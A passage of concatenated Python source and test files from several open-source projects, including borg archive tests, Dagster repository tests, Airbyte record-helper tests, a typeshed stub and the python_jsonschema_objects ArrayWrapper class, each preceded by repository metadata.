def setUp(self):
super().setUp()
self.baseline_k = 2
self.baseline_privacy_param = clustering_params.DifferentialPrivacyParam()
def test_small_dataset(self):
datapoints = np.array([[0.3, 0.2]])
data = clustering_params.Data(datapoints=datapoints, radius=1)
self.assertIsNotNone(
clustering_algorithm.private_lsh_clustering(
self.baseline_k,
data,
self.baseline_privacy_param,
multipliers=clustering_params.PrivacyCalculatorMultiplier(),
)
)
def test_privacy_budget_split_does_not_error(self):
datapoints = np.array([[0.3, 0.2]])
data = clustering_params.Data(datapoints=datapoints, radius=1)
self.assertIsNotNone(
clustering_algorithm.private_lsh_clustering(
self.baseline_k,
data,
self.baseline_privacy_param,
privacy_budget_split=clustering_params.PrivacyBudgetSplit(),
)
)
if __name__ == '__main__':
absltest.main()
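# --- Illustrative usage (added sketch, not part of the test module) ---
# End-to-end call of the API exercised by the tests above. Assumptions: the
# `clustering` package from google/differential-privacy is importable and the
# defaults match those constructed in ClusteringEdgeCaseTest.
import numpy as np
from clustering import clustering_algorithm, clustering_params
rng = np.random.default_rng(0)
data = clustering_params.Data(datapoints=rng.normal(size=(100, 2)), radius=10.0)
privacy_param = clustering_params.DifferentialPrivacyParam()
result = clustering_algorithm.private_lsh_clustering(
    2, data, privacy_param,
    multipliers=clustering_params.PrivacyCalculatorMultiplier())
print(len(result.centers), result.loss)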
# ---- file: /src/borg/testsuite/archive.py | repo: borgbackup/borg | license: permissive (BSD-3-Clause) | lang: Python ----
import json
import os
from collections import OrderedDict
from datetime import datetime, timezone
from io import StringIO
from unittest.mock import Mock
import pytest
from . import rejected_dotdot_paths
from ..crypto.key import PlaintextKey
from ..archive import Archive, CacheChunkBuffer, RobustUnpacker, valid_msgpacked_dict, ITEM_KEYS, Statistics
from ..archive import BackupOSError, backup_io, backup_io_iter, get_item_uid_gid
from ..helpers import msgpack
from ..item import Item, ArchiveItem
from ..manifest import Manifest
from ..platform import uid2user, gid2group, is_win32
@pytest.fixture()
def stats():
stats = Statistics()
stats.update(20, unique=True)
stats.nfiles = 1
return stats
def test_stats_basic(stats):
assert stats.osize == 20
assert stats.usize == 20
stats.update(20, unique=False)
assert stats.osize == 40
assert stats.usize == 20
@pytest.mark.parametrize(
"item_path, update_size, expected_output",
[
("", 0, "20 B O 20 B U 1 N "), # test unchanged 'stats' fixture
("foo", 10**3, "1.02 kB O 20 B U 1 N foo"), # test updated original size and set item path
# test long item path which exceeds 80 characters
("foo" * 40, 10**3, "1.02 kB O 20 B U 1 N foofoofoofoofoofoofoofoofo...foofoofoofoofoofoofoofoofoofoo"),
],
)
def test_stats_progress(item_path, update_size, expected_output, stats, monkeypatch, columns=80):
monkeypatch.setenv("COLUMNS", str(columns))
out = StringIO()
item = Item(path=item_path) if item_path else None
s = expected_output
stats.update(update_size, unique=False)
stats.show_progress(item=item, stream=out)
buf = " " * (columns - len(s))
assert out.getvalue() == s + buf + "\r"
def test_stats_format(stats):
assert (
str(stats)
== """\
Number of files: 1
Original size: 20 B
Deduplicated size: 20 B
Time spent in hashing: 0.00 seconds
Time spent in chunking: 0.00 seconds
Added files: 0
Unchanged files: 0
Modified files: 0
Error files: 0
Files changed while reading: 0
Bytes read from remote: 0
Bytes sent to remote: 0
"""
)
s = f"{stats.osize_fmt}"
assert s == "20 B"
# kind of redundant, but id is variable so we can't match reliably
assert repr(stats) == f"<Statistics object at {id(stats):#x} (20, 20)>"
def test_stats_progress_json(stats):
stats.output_json = True
out = StringIO()
stats.show_progress(item=Item(path="foo"), stream=out)
result = json.loads(out.getvalue())
assert result["type"] == "archive_progress"
assert isinstance(result["time"], float)
assert result["finished"] is False
assert result["path"] == "foo"
assert result["original_size"] == 20
assert result["nfiles"] == 1
out = StringIO()
stats.show_progress(stream=out, final=True)
result = json.loads(out.getvalue())
assert result["type"] == "archive_progress"
assert isinstance(result["time"], float)
assert result["finished"] is True # see #6570
assert "path" not in result
assert "original_size" not in result
assert "nfiles" not in result
@pytest.mark.parametrize(
"isoformat, expected",
[
("1970-01-01T00:00:01.000001", datetime(1970, 1, 1, 0, 0, 1, 1, timezone.utc)), # test with microseconds
("1970-01-01T00:00:01", datetime(1970, 1, 1, 0, 0, 1, 0, timezone.utc)), # test without microseconds
],
)
def test_timestamp_parsing(monkeypatch, isoformat, expected):
repository = Mock()
key = PlaintextKey(repository)
manifest = Manifest(key, repository)
a = Archive(manifest, "test", create=True)
a.metadata = ArchiveItem(time=isoformat)
assert a.ts == expected
class MockCache:
class MockRepo:
def async_response(self, wait=True):
pass
def __init__(self):
self.objects = {}
self.repository = self.MockRepo()
def add_chunk(self, id, meta, data, stats=None, wait=True):
self.objects[id] = data
return id, len(data)
def test_cache_chunk_buffer():
data = [Item(path="p1"), Item(path="p2")]
cache = MockCache()
key = PlaintextKey(None)
chunks = CacheChunkBuffer(cache, key, None)
for d in data:
chunks.add(d)
chunks.flush()
chunks.flush(flush=True)
assert len(chunks.chunks) == 2
unpacker = msgpack.Unpacker()
for id in chunks.chunks:
unpacker.feed(cache.objects[id])
assert data == [Item(internal_dict=d) for d in unpacker]
def test_partial_cache_chunk_buffer():
big = "0123456789abcdefghijklmnopqrstuvwxyz" * 25000
data = [Item(path="full", target=big), Item(path="partial", target=big)]
cache = MockCache()
key = PlaintextKey(None)
chunks = CacheChunkBuffer(cache, key, None)
for d in data:
chunks.add(d)
chunks.flush(flush=False)
# the code is expected to leave the last partial chunk in the buffer
assert len(chunks.chunks) == 3
assert chunks.buffer.tell() > 0
# now really flush
chunks.flush(flush=True)
assert len(chunks.chunks) == 4
assert chunks.buffer.tell() == 0
unpacker = msgpack.Unpacker()
for id in chunks.chunks:
unpacker.feed(cache.objects[id])
assert data == [Item(internal_dict=d) for d in unpacker]
def make_chunks(items):
return b"".join(msgpack.packb({"path": item}) for item in items)
def _validator(value):
return isinstance(value, dict) and value.get("path") in ("foo", "bar", "boo", "baz")
def process(input):
unpacker = RobustUnpacker(validator=_validator, item_keys=ITEM_KEYS)
result = []
for should_sync, chunks in input:
if should_sync:
unpacker.resync()
for data in chunks:
unpacker.feed(data)
for item in unpacker:
result.append(item)
return result
def test_extra_garbage_no_sync():
chunks = [(False, [make_chunks(["foo", "bar"])]), (False, [b"garbage"] + [make_chunks(["boo", "baz"])])]
res = process(chunks)
assert res == [{"path": "foo"}, {"path": "bar"}, 103, 97, 114, 98, 97, 103, 101, {"path": "boo"}, {"path": "baz"}]
def split(left, length):
parts = []
while left:
parts.append(left[:length])
left = left[length:]
return parts
def test_correct_stream():
chunks = split(make_chunks(["foo", "bar", "boo", "baz"]), 2)
input = [(False, chunks)]
result = process(input)
assert result == [{"path": "foo"}, {"path": "bar"}, {"path": "boo"}, {"path": "baz"}]
def test_missing_chunk():
chunks = split(make_chunks(["foo", "bar", "boo", "baz"]), 4)
input = [(False, chunks[:3]), (True, chunks[4:])]
result = process(input)
assert result == [{"path": "foo"}, {"path": "boo"}, {"path": "baz"}]
def test_corrupt_chunk():
chunks = split(make_chunks(["foo", "bar", "boo", "baz"]), 4)
input = [(False, chunks[:3]), (True, [b"gar", b"bage"] + chunks[3:])]
result = process(input)
assert result == [{"path": "foo"}, {"path": "boo"}, {"path": "baz"}]
@pytest.fixture
def item_keys_serialized():
return [msgpack.packb(name) for name in ITEM_KEYS]
@pytest.mark.parametrize(
"packed",
[b"", b"x", b"foobar"]
+ [
msgpack.packb(o)
for o in (
[None, 0, 0.0, False, "", {}, [], ()]
+ [42, 23.42, True, b"foobar", {b"foo": b"bar"}, [b"foo", b"bar"], (b"foo", b"bar")]
)
],
)
def test_invalid_msgpacked_item(packed, item_keys_serialized):
assert not valid_msgpacked_dict(packed, item_keys_serialized)
# pytest-xdist requires always same order for the keys and dicts:
IK = sorted(list(ITEM_KEYS))
@pytest.mark.parametrize(
"packed",
[
msgpack.packb(o)
for o in [
{"path": b"/a/b/c"}, # small (different msgpack mapping type!)
OrderedDict((k, b"") for k in IK), # as big (key count) as it gets
OrderedDict((k, b"x" * 1000) for k in IK), # as big (key count and volume) as it gets
]
],
ids=["minimal", "empty-values", "long-values"],
)
def test_valid_msgpacked_items(packed, item_keys_serialized):
assert valid_msgpacked_dict(packed, item_keys_serialized)
def test_key_length_msgpacked_items():
key = "x" * 32 # 31 bytes is the limit for fixstr msgpack type
data = {key: b""}
item_keys_serialized = [msgpack.packb(key)]
assert valid_msgpacked_dict(msgpack.packb(data), item_keys_serialized)
def test_backup_io():
with pytest.raises(BackupOSError):
with backup_io:
raise OSError(123)
def test_backup_io_iter():
class Iterator:
def __init__(self, exc):
self.exc = exc
def __next__(self):
raise self.exc()
oserror_iterator = Iterator(OSError)
with pytest.raises(BackupOSError):
for _ in backup_io_iter(oserror_iterator):
pass
normal_iterator = Iterator(StopIteration)
for _ in backup_io_iter(normal_iterator):
assert False, "StopIteration handled incorrectly"
def test_get_item_uid_gid():
# test requires that:
# - a user/group name for the current process' real uid/gid exists.
# - a system user/group udoesnotexist:gdoesnotexist does NOT exist.
try:
puid, pgid = os.getuid(), os.getgid() # UNIX only
except AttributeError:
puid, pgid = 0, 0
puser, pgroup = uid2user(puid), gid2group(pgid)
# this is intentionally a "strange" item, with not matching ids/names.
item = Item(path="filename", uid=1, gid=2, user=puser, group=pgroup)
uid, gid = get_item_uid_gid(item, numeric=False)
# these are found via a name-to-id lookup
assert uid == puid
assert gid == pgid
uid, gid = get_item_uid_gid(item, numeric=True)
# these are directly taken from the item.uid and .gid
assert uid == 1
assert gid == 2
uid, gid = get_item_uid_gid(item, numeric=False, uid_forced=3, gid_forced=4)
# these are enforced (not from item metadata)
assert uid == 3
assert gid == 4
# item metadata broken, has negative ids.
item = Item(path="filename", uid=-1, gid=-2, user=puser, group=pgroup)
uid, gid = get_item_uid_gid(item, numeric=True)
# use the uid/gid defaults (which both default to 0).
assert uid == 0
assert gid == 0
uid, gid = get_item_uid_gid(item, numeric=True, uid_default=5, gid_default=6)
# use the uid/gid defaults (as given).
assert uid == 5
assert gid == 6
# item metadata broken, has negative ids and non-existing user/group names.
item = Item(path="filename", uid=-3, gid=-4, user="udoesnotexist", group="gdoesnotexist")
uid, gid = get_item_uid_gid(item, numeric=False)
# use the uid/gid defaults (which both default to 0).
assert uid == 0
assert gid == 0
uid, gid = get_item_uid_gid(item, numeric=True, uid_default=7, gid_default=8)
# use the uid/gid defaults (as given).
assert uid == 7
assert gid == 8
if not is_win32:
# due to the hack in borg.platform.windows user2uid / group2gid, these always return 0
# (no matter which username we ask for) and they never raise a KeyError (like e.g. for
# a non-existing user/group name). Thus, these tests can currently not succeed on win32.
# item metadata has valid uid/gid, but non-existing user/group names.
item = Item(path="filename", uid=9, gid=10, user="udoesnotexist", group="gdoesnotexist")
uid, gid = get_item_uid_gid(item, numeric=False)
# because user/group name does not exist here, use valid numeric ids from item metadata.
assert uid == 9
assert gid == 10
uid, gid = get_item_uid_gid(item, numeric=False, uid_default=11, gid_default=12)
# because item uid/gid seems valid, do not use the given uid/gid defaults
assert uid == 9
assert gid == 10
# item metadata only has uid/gid, but no user/group.
item = Item(path="filename", uid=13, gid=14)
uid, gid = get_item_uid_gid(item, numeric=False)
# it'll check user/group first, but as there is nothing in the item, falls back to uid/gid.
assert uid == 13
assert gid == 14
uid, gid = get_item_uid_gid(item, numeric=True)
# does not check user/group, directly returns uid/gid.
assert uid == 13
assert gid == 14
# item metadata has no uid/gid/user/group.
item = Item(path="filename")
uid, gid = get_item_uid_gid(item, numeric=False, uid_default=15)
# as there is nothing, it'll fall back to uid_default/gid_default.
assert uid == 15
assert gid == 0
uid, gid = get_item_uid_gid(item, numeric=True, gid_default=16)
# as there is nothing, it'll fall back to uid_default/gid_default.
assert uid == 0
assert gid == 16
def test_reject_non_sanitized_item():
for path in rejected_dotdot_paths:
with pytest.raises(ValueError, match="unexpected '..' element in path"):
Item(path=path, user="root", group="root")
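# --- Illustrative usage (added sketch, not part of the test suite) ---
# The msgpack validity helper tested above, used standalone. Assumptions:
# borgbackup is installed as the `borg` package, so borg.archive and
# borg.helpers.msgpack resolve like the relative imports at the top.
from borg.archive import ITEM_KEYS, valid_msgpacked_dict
from borg.helpers import msgpack
item_keys_serialized = [msgpack.packb(name) for name in ITEM_KEYS]
assert valid_msgpacked_dict(msgpack.packb({"path": b"/a/b/c"}), item_keys_serialized)
assert not valid_msgpacked_dict(b"garbage", item_keys_serialized)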
# ---- file: /dts/airbyte/airbyte-cdk/python/unit_tests/sources/utils/test_record_helper.py | repo: alldatacenter/alldata | license: permissive (MIT, Elastic-2.0, Apache-2.0, BSD-3-Clause) | lang: Python ----
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
from unittest.mock import MagicMock
import pytest
from airbyte_cdk.models import (
AirbyteLogMessage,
AirbyteMessage,
AirbyteRecordMessage,
AirbyteStateMessage,
AirbyteStateType,
AirbyteTraceMessage,
Level,
TraceType,
)
from airbyte_cdk.models import Type as MessageType
from airbyte_cdk.sources.utils.record_helper import stream_data_to_airbyte_message
NOW = 1234567
STREAM_NAME = "my_stream"
@pytest.mark.parametrize(
"test_name, data, expected_message",
[
(
"test_data_to_airbyte_record",
{"id": 0, "field_A": 1.0, "field_B": "airbyte"},
AirbyteMessage(
type=MessageType.RECORD,
record=AirbyteRecordMessage(stream="my_stream", data={"id": 0, "field_A": 1.0, "field_B": "airbyte"}, emitted_at=NOW),
),
),
],
)
def test_data_or_record_to_airbyte_record(test_name, data, expected_message):
transformer = MagicMock()
schema = {}
message = stream_data_to_airbyte_message(STREAM_NAME, data, transformer, schema)
message.record.emitted_at = NOW
if isinstance(data, dict):
transformer.transform.assert_called_with(data, schema)
else:
assert not transformer.transform.called
assert expected_message == message
@pytest.mark.parametrize(
"test_name, data, expected_message",
[
(
"test_log_message_to_airbyte_record",
AirbyteLogMessage(level=Level.INFO, message="Hello, this is a log message"),
AirbyteMessage(type=MessageType.LOG, log=AirbyteLogMessage(level=Level.INFO, message="Hello, this is a log message")),
),
(
"test_trace_message_to_airbyte_record",
AirbyteTraceMessage(type=TraceType.ERROR, emitted_at=101),
AirbyteMessage(type=MessageType.TRACE, trace=AirbyteTraceMessage(type=TraceType.ERROR, emitted_at=101)),
),
],
)
def test_log_or_trace_to_message(test_name, data, expected_message):
transformer = MagicMock()
schema = {}
message = stream_data_to_airbyte_message(STREAM_NAME, data, transformer, schema)
assert not transformer.transform.called
assert expected_message == message
@pytest.mark.parametrize(
"test_name, data",
[
("test_log_message_to_airbyte_record", AirbyteStateMessage(type=AirbyteStateType.STREAM)),
],
)
def test_state_message_to_message(test_name, data):
transformer = MagicMock()
schema = {}
with pytest.raises(ValueError):
stream_data_to_airbyte_message(STREAM_NAME, data, transformer, schema)
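# --- Illustrative usage (added sketch, not part of the test module) ---
# Direct call of the helper under test. Assumptions: airbyte-cdk is installed;
# MagicMock stands in for a real record transformer, exactly as in the tests.
from unittest.mock import MagicMock
from airbyte_cdk.sources.utils.record_helper import stream_data_to_airbyte_message
message = stream_data_to_airbyte_message("my_stream", {"id": 1}, MagicMock(), {})
print(message.type, message.record.data)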
# ---- file: /simics/bin/fuzz-summary.py | repo: mfthomps/RESim | license: permissive (BSD-2-Clause) | lang: Python ----
#!/usr/bin/env python
#
# given an AFL session named by target, provide a summary of
# queue files and unique hits files (post playAFL).
#
import sys
import os
import glob
import json
import argparse
import subprocess
try:
import ConfigParser
except:
import configparser as ConfigParser
resim_dir = os.getenv('RESIM_DIR')
sys.path.append(os.path.join(resim_dir, 'simics', 'monitorCore'))
import aflPath
def main():
afldir = os.getenv('AFL_DIR')
parser = argparse.ArgumentParser(prog='fuzz-summary.py', description='Show fuzzing summary')
parser.add_argument('target', action='store', help='The target workspace name.')
args = parser.parse_args()
unique_files = aflPath.getTargetQueue(args.target)
queue_files = aflPath.getTargetQueue(args.target, get_all=True)
print('AFL found %d queue files (execution paths), some may be duplicates.' % len(queue_files))
print('RESim sees %d unique execution paths.' % len(unique_files))
if __name__ == '__main__':
sys.exit(main())
# ---- file: /php_companion/commands/goto_definition_scope.py | repo: erichard/SublimePHPCompanion | license: permissive (MIT) | lang: Python ----
import sublime
import sublime_plugin
import re
class GotoDefinitionScopeCommand(sublime_plugin.TextCommand):
def run(self, edit):
run = GTDRun(self.view, self.view.window())
run.do()
class GTDRun:
def __init__(self, view, window):
self.view = view
self.window = window
self.selected_region = self.view.word(self.view.sel()[0])
def do(self):
if self.in_class_scope():
selected_str = self.view.substr(self.selected_region)
for symbol in self.view.symbols():
if symbol[1] == selected_str:
self.view.sel().clear()
self.view.sel().add(symbol[0])
self.view.show(symbol[0])
return
# falls back to the original functionality
self.window.run_command("goto_definition")
def in_class_scope(self):
selected_point = self.selected_region.begin()
        # look back 60 characters from the caret; this window may occasionally be too small
        search_str = self.view.substr(sublime.Region(selected_point - 60, selected_point))
        return re.search(r"(\$this->|self::|static::)\s*$", search_str) is not None
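# --- Illustrative check (added sketch, not part of the plugin) ---
# The scope regex above can be exercised with plain `re`, no Sublime API needed;
# the sample strings are hypothetical.
import re
SCOPE_RE = re.compile(r"(\$this->|self::|static::)\s*$")
assert SCOPE_RE.search("return $this->")     # member access on $this: match
assert SCOPE_RE.search("echo self::")        # same-class static access: match
assert not SCOPE_RE.search("$repository->")  # other receivers: no match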
# ---- file: /python_modules/dagster/dagster_tests/general_tests/test_repository.py | repo: dagster-io/dagster | license: permissive (Apache-2.0) | lang: Python ----
"""Repository of test jobs.
"""
import pytest
from dagster import (
AssetKey,
GraphDefinition,
Int,
IntMetadataValue,
IOManager,
JobDefinition,
TextMetadataValue,
asset,
graph,
io_manager,
job,
multiprocess_executor,
op,
repository,
resource,
with_resources,
)
from dagster._check import CheckError
def define_empty_job():
return JobDefinition(name="empty_job", graph_def=GraphDefinition(name="empty_graph"))
def define_simple_job():
@op
def return_two():
return 2
@job
def simple_job():
return_two()
return simple_job
def define_with_resources_job():
@resource(config_schema=Int)
def adder_resource(init_context):
return lambda x: x + init_context.resource_config
@resource(config_schema=Int)
def multer_resource(init_context):
return lambda x: x * init_context.resource_config
@resource(config_schema={"num_one": Int, "num_two": Int})
def double_adder_resource(init_context):
return (
lambda x: x
+ init_context.resource_config["num_one"]
+ init_context.resource_config["num_two"]
)
@op(required_resource_keys={"modifier"})
def apply_to_three(context):
return context.resources.modifier(3)
@graph
def my_graph():
apply_to_three()
adder_job = my_graph.to_job(name="adder_job", resource_defs={"modifier": adder_resource})
multer_job = my_graph.to_job(name="multer_job", resource_defs={"modifier": multer_resource})
double_adder_job = my_graph.to_job(
name="double_adder_job", resource_defs={"modifier": double_adder_resource}
)
multi_job = my_graph.to_job(
"multi_job", resource_defs={"modifier": adder_resource}, executor_def=multiprocess_executor
)
return [adder_job, multer_job, double_adder_job, multi_job]
@repository
def dagster_test_repository():
return [
define_empty_job(),
define_simple_job(),
*define_with_resources_job(),
]
def test_repository_construction():
assert dagster_test_repository
@repository(metadata={"string": "foo", "integer": 123})
def metadata_repository():
return []
def test_repository_metadata():
assert metadata_repository.metadata == {
"string": TextMetadataValue("foo"),
"integer": IntMetadataValue(123),
}
@repository
def empty_repository():
return []
def test_invalid_repository():
with pytest.raises(CheckError):
@repository
def invalid_repository(_invalid_arg: str):
return []
def test_asset_value_loader():
class MyIOManager(IOManager):
def handle_output(self, context, obj):
assert False
def load_input(self, context):
return 5
@io_manager()
def my_io_manager():
return MyIOManager()
@asset
def asset1():
...
@repository
def repo():
return with_resources([asset1], resource_defs={"io_manager": my_io_manager})
value = repo.load_asset_value(AssetKey("asset1"))
assert value == 5
def test_asset_value_loader_with_config():
class MyIOManager(IOManager):
def __init__(self, key):
self.key = key
def handle_output(self, context, obj):
assert False
def load_input(self, context):
return self.key
@io_manager(config_schema={"key": int})
def my_io_manager(context):
return MyIOManager(context.resource_config["key"])
@asset
def asset1():
...
@repository
def repo():
return with_resources([asset1], resource_defs={"io_manager": my_io_manager})
resource_config = {"io_manager": {"config": {"key": 5}}}
value = repo.load_asset_value(AssetKey("asset1"), resource_config=resource_config)
assert value == 5
def test_asset_value_loader_with_resources():
@resource(config_schema={"key": int})
def io_resource(context):
return context.resource_config["key"]
class MyIOManager(IOManager):
def handle_output(self, context, obj):
assert False
def load_input(self, context):
return context.resources.io_resource
@io_manager(required_resource_keys={"io_resource"})
def my_io_manager():
return MyIOManager()
@asset
def asset1():
...
@repository
def repo():
return with_resources(
[asset1], resource_defs={"io_manager": my_io_manager, "io_resource": io_resource}
)
resource_config = {"io_resource": {"config": {"key": 5}}}
value = repo.load_asset_value(AssetKey("asset1"), resource_config=resource_config)
assert value == 5
def test_asset_value_loader_with_metadata():
class MyIOManager(IOManager):
def handle_output(self, context, obj):
assert False
def load_input(self, context):
assert context.metadata is not None
return context.metadata.get("return") or 5
@io_manager()
def my_io_manager():
return MyIOManager()
@asset
def asset1():
...
@asset(metadata={"return": 20})
def asset2():
...
@repository
def repo():
return with_resources([asset1, asset2], resource_defs={"io_manager": my_io_manager})
value = repo.load_asset_value(AssetKey("asset1"))
assert value == 5
value = repo.load_asset_value(AssetKey("asset1"), metadata={"return": 10})
assert value == 10
value = repo.load_asset_value(AssetKey("asset2"))
assert value == 5
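# Takeaway from the assertions above: context.metadata on the input context
# reflects only the metadata passed to load_asset_value itself. Metadata
# declared on the asset definition (asset2's {"return": 20}) does not show up
# there, so the io manager falls back to its default of 5.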
|
1e3f3005b85cca4dc63e700b146998078079fa37
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/helpers/typeshed/stdlib/@python2/StringIO.pyi
|
4aa0cb3fcd5a5420f7756340a7345690ca477bd4
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 1,127
|
pyi
|
StringIO.pyi
|
from typing import IO, Any, AnyStr, Generic, Iterable, Iterator
class StringIO(IO[AnyStr], Generic[AnyStr]):
closed: bool
softspace: int
len: int
name: str
def __init__(self, buf: AnyStr = ...) -> None: ...
def __iter__(self) -> Iterator[AnyStr]: ...
def next(self) -> AnyStr: ...
def close(self) -> None: ...
def isatty(self) -> bool: ...
def seek(self, pos: int, mode: int = ...) -> int: ...
def tell(self) -> int: ...
def read(self, n: int = ...) -> AnyStr: ...
def readline(self, length: int = ...) -> AnyStr: ...
def readlines(self, sizehint: int = ...) -> list[AnyStr]: ...
def truncate(self, size: int | None = ...) -> int: ...
def write(self, s: AnyStr) -> int: ...
def writelines(self, iterable: Iterable[AnyStr]) -> None: ...
def flush(self) -> None: ...
def getvalue(self) -> AnyStr: ...
def __enter__(self) -> Any: ...
def __exit__(self, type: Any, value: Any, traceback: Any) -> Any: ...
def fileno(self) -> int: ...
def readable(self) -> bool: ...
def seekable(self) -> bool: ...
def writable(self) -> bool: ...
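# Usage sketch (comments only -- stubs carry no runtime code): StringIO is
# generic in AnyStr, so the element type follows the initial buffer:
#   buf = StringIO("hello")  # StringIO[str]
#   buf.read(2)              # "he"
#   buf.getvalue()           # "hello"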
|
30dc7a9e9fcb5c6f047317f7f1456131c01a3095
|
c56f70ff9e593118ada1f188e79b0f3015f91f24
|
/mesh_tensorflow/transformer/gin/layouts/single.gin
|
d7191c769634d1bafc94deec778a3dbb29e2f69f
|
[
"Apache-2.0"
] |
permissive
|
tensorflow/mesh
|
44f567ec4d5fa0db58f1a41b818702603d781c64
|
fbf7b1e547e8b8cb134e81e1cd350c312c0b5a16
|
refs/heads/master
| 2023-08-15T09:18:33.205493
| 2023-05-16T13:01:43
| 2023-05-16T13:01:43
| 149,666,254
| 1,508
| 290
|
Apache-2.0
| 2023-05-16T13:01:48
| 2018-09-20T20:23:34
|
Python
|
UTF-8
|
Python
| false
| false
| 192
|
gin
|
single.gin
|
# -*-Python-*-
utils.run.layout_rules = ""
utils.run.mesh_shape = ""
# This is likely a CPU, which cannot handle bfloat16 activations.
utils.get_variable_dtype.activation_dtype = "float32"
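# Note (editorial sketch): an empty mesh_shape/layout_rules pair disables
# mesh splitting entirely -- every tensor dimension stays on one device,
# hence the name "single".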
|
3971d6de593d478ec8180abc571d1fa0429addb0
|
b097bc2fba0629d592d76d9c7649d9a62789afb6
|
/python_jsonschema_objects/wrapper_types.py
|
c3af3f06f2f34d9cc2da6d752574c450a0d3ac65
|
[
"MIT"
] |
permissive
|
cwacek/python-jsonschema-objects
|
d91bb4d6c69fffcc24f45f33e05174a627293449
|
2a5aeb29a953cff3d4fd82f19c0d46342af1da36
|
refs/heads/master
| 2023-09-01T11:49:43.767991
| 2023-08-17T01:37:45
| 2023-08-17T01:37:45
| 18,216,839
| 356
| 113
|
MIT
| 2023-09-14T01:56:32
| 2014-03-28T15:29:21
|
Python
|
UTF-8
|
Python
| false
| false
| 11,519
|
py
|
wrapper_types.py
|
import collections
import logging
import six
from python_jsonschema_objects import util
from python_jsonschema_objects.validators import registry, ValidationError
from python_jsonschema_objects.util import lazy_format as fmt
logger = logging.getLogger(__name__)
class ArrayWrapper(collections.abc.MutableSequence):
"""A wrapper for array-like structures.
This implements all of the array like behavior that one would want,
with a dirty-tracking mechanism to avoid constant validation costs.
"""
@property
def strict(self):
return getattr(self, "_strict_", False)
def __len__(self):
return len(self.data)
def mark_or_revalidate(self):
if self.strict:
self.validate()
else:
self._dirty = True
def __delitem__(self, index):
self.data.pop(index)
self.mark_or_revalidate()
def insert(self, index, value):
self.data.insert(index, value)
self.mark_or_revalidate()
def __setitem__(self, index, value):
self.data[index] = value
self.mark_or_revalidate()
def __getitem__(self, idx):
return self.typed_elems[idx]
def __eq__(self, other):
if isinstance(other, ArrayWrapper):
return self.for_json() == other.for_json()
else:
return self.for_json() == other
def __init__(self, ary):
"""Initialize a wrapper for the array
Args:
ary: (list-like, or ArrayWrapper)
"""
""" Marks whether or not the underlying array has been modified """
self._dirty = True
""" Holds a typed copy of the array """
self._typed = None
if isinstance(ary, (list, tuple, collections.abc.Sequence)):
self.data = ary
else:
raise TypeError("Invalid value given to array validator: {0}".format(ary))
logger.debug(fmt("Initializing ArrayWrapper {} with {}", self, ary))
@property
def typed_elems(self):
logger.debug(fmt("Accessing typed_elems of ArrayWrapper {} ", self))
if self._typed is None or self._dirty is True:
self.validate()
return self._typed
def __repr__(self):
return "<%s=%s>" % (self.__class__.__name__, str(self.data))
@classmethod
def from_json(cls, jsonmsg):
import json
msg = json.loads(jsonmsg)
obj = cls(msg)
obj.validate()
return obj
def serialize(self):
enc = util.ProtocolJSONEncoder()
return enc.encode(self.typed_elems)
def for_json(self):
from python_jsonschema_objects import classbuilder
out = []
for item in self.typed_elems:
if isinstance(
item,
(classbuilder.ProtocolBase, classbuilder.LiteralValue, ArrayWrapper),
):
out.append(item.for_json())
else:
out.append(item)
return out
def validate(self):
if self.strict or self._dirty:
self.validate_items()
self.validate_length()
self.validate_uniqueness()
return True
def validate_uniqueness(self):
if getattr(self, "uniqueItems", False) is True:
testset = set(repr(item) for item in self.data)
if len(testset) != len(self.data):
raise ValidationError(
"{0} has duplicate elements, but uniqueness required".format(
self.data
)
)
def validate_length(self):
if getattr(self, "minItems", None) is not None:
if len(self.data) < self.minItems:
raise ValidationError(
"{1} has too few elements. Wanted {0}.".format(
self.minItems, self.data
)
)
if getattr(self, "maxItems", None) is not None:
if len(self.data) > self.maxItems:
raise ValidationError(
"{1} has too many elements. Wanted {0}.".format(
self.maxItems, self.data
)
)
def validate_items(self):
"""Validates the items in the backing array, including
performing type validation.
Sets the _typed property and clears the dirty flag as a side effect
Returns:
The typed array
"""
logger.debug(fmt("Validating {}", self))
from python_jsonschema_objects import classbuilder
if self.__itemtype__ is None:
return
type_checks = self.__itemtype__
if not isinstance(type_checks, (tuple, list)):
            # a single schema was given (e.g. items={'type': 'string'});
            # apply the same check to every element
type_checks = [type_checks] * len(self.data)
elif len(type_checks) > len(self.data):
raise ValidationError(
"{1} does not have sufficient elements to validate against {0}".format(
self.__itemtype__, self.data
)
)
typed_elems = []
for elem, typ in zip(self.data, type_checks):
if isinstance(typ, dict):
for param, paramval in six.iteritems(typ):
validator = registry(param)
if validator is not None:
validator(paramval, elem, typ)
typed_elems.append(elem)
elif util.safe_issubclass(typ, classbuilder.LiteralValue):
val = typ(elem)
val.validate()
typed_elems.append(val)
elif util.safe_issubclass(typ, classbuilder.ProtocolBase):
if not isinstance(elem, typ):
try:
if isinstance(
elem, (six.string_types, six.integer_types, float)
):
val = typ(elem)
else:
val = typ(**util.coerce_for_expansion(elem))
except TypeError as e:
raise ValidationError(
"'{0}' is not a valid value for '{1}': {2}".format(
elem, typ, e
)
)
else:
val = elem
val.validate()
typed_elems.append(val)
elif util.safe_issubclass(typ, ArrayWrapper):
val = typ(elem)
val.validate()
typed_elems.append(val)
elif isinstance(typ, (classbuilder.TypeProxy, classbuilder.TypeRef)):
try:
if isinstance(elem, (six.string_types, six.integer_types, float)):
val = typ(elem)
else:
val = typ(**util.coerce_for_expansion(elem))
except TypeError as e:
raise ValidationError(
"'{0}' is not a valid value for '{1}': {2}".format(elem, typ, e)
)
else:
val.validate()
typed_elems.append(val)
self._dirty = False
self._typed = typed_elems
return typed_elems
@staticmethod
def create(name, item_constraint=None, **addl_constraints):
"""Create an array validator based on the passed in constraints.
If item_constraint is a tuple, it is assumed that tuple validation
is being performed. If it is a class or dictionary, list validation
will be performed. Classes are assumed to be subclasses of ProtocolBase,
while dictionaries are expected to be basic types ('string', 'number', ...).
addl_constraints is expected to be key-value pairs of any of the other
constraints permitted by JSON Schema v4.
"""
logger.debug(
fmt(
